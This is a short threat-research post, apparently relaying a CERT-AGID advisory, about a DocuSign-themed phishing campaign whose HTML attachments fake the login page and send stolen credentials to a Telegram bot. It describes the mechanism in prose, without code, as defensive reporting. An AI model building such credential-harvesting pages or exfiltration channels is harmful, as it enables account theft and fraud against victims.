Threat Research

False DocuSign Notification: Credentials Sent to Telegram Bot

Italy-Cert-agid

CERT-AGID has warned of a DocuSign-themed phishing campaign that uses HTML attachments mimicking the DocuSign login page to capture credentials. The stolen logins are relayed to a Telegram bot, enabling attackers to access sensitive documents or monetize the credentials. #DocuSign #TelegramBot #CERT-AGID

Keypoints

  • CERT-AGID detected a phishing campaign impersonating DocuSign.
  • Malicious emails include HTML attachments that replicate the DocuSign login interface.
  • Embedded JavaScript in the attachment forwards captured credentials to a Telegram bot.
  • Compromised accounts could expose confidential contracts, personal data, and enable fraud.
  • CERT-AGID published the Telegram bot URL via its IoC feed; HTML file hashes vary per recipient.
  • Users are advised to remain vigilant and verify unexpected DocuSign notifications before entering credentials.

MITRE Techniques

  • [T1566] Phishing – Uses deceptive emails with HTML attachments to trick recipients into submitting credentials (‘These deceptive emails contain HTML attachments designed to steal user credentials’).
  • [T1003] Credential Dumping – Harvests user credentials from the phishing page to gain unauthorized access to accounts (‘Collects user credentials to gain unauthorized access to accounts’).
  • [T1071] Application Layer Protocol – Uses Telegram as a channel to receive exfiltrated credentials (‘send the victim’s credentials to a Telegram bot’).

Indicators of Compromise

  • [URL] Telegram bot URL – The Telegram bot URL is listed as the primary IoC and is provided via CERT-AGID’s IoC feed (see CERT-AGID IoC feed link in the source).
  • [File hashes] HTML attachment hashes – HTML file hashes are customized per recipient and are not explicitly listed in the article (no example hashes provided).

CERT-AGID has flagged a targeted phishing campaign that imitates DocuSign notifications. Attackers send emails containing HTML attachments which, when opened in a browser, present a realistic DocuSign login form designed to trick users into entering their credentials.

The injected JavaScript in the HTML file captures submitted usernames and passwords and forwards them to a Telegram bot controlled by the threat actor. Because the HTML files are customized per recipient, their hashes change, so CERT-AGID published the Telegram bot URL via its IoC feed as the most actionable indicator.

Compromised credentials can let attackers access confidential documents or be sold to other criminals, increasing fraud risk. Users should treat unexpected DocuSign emails with caution, verify sender details, avoid opening unsolicited attachments, and report suspicious messages to their security team.

Read more: https://www.hendryadrian.com/false-docusign-notification-credentials-sent-to-telegram-bot/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint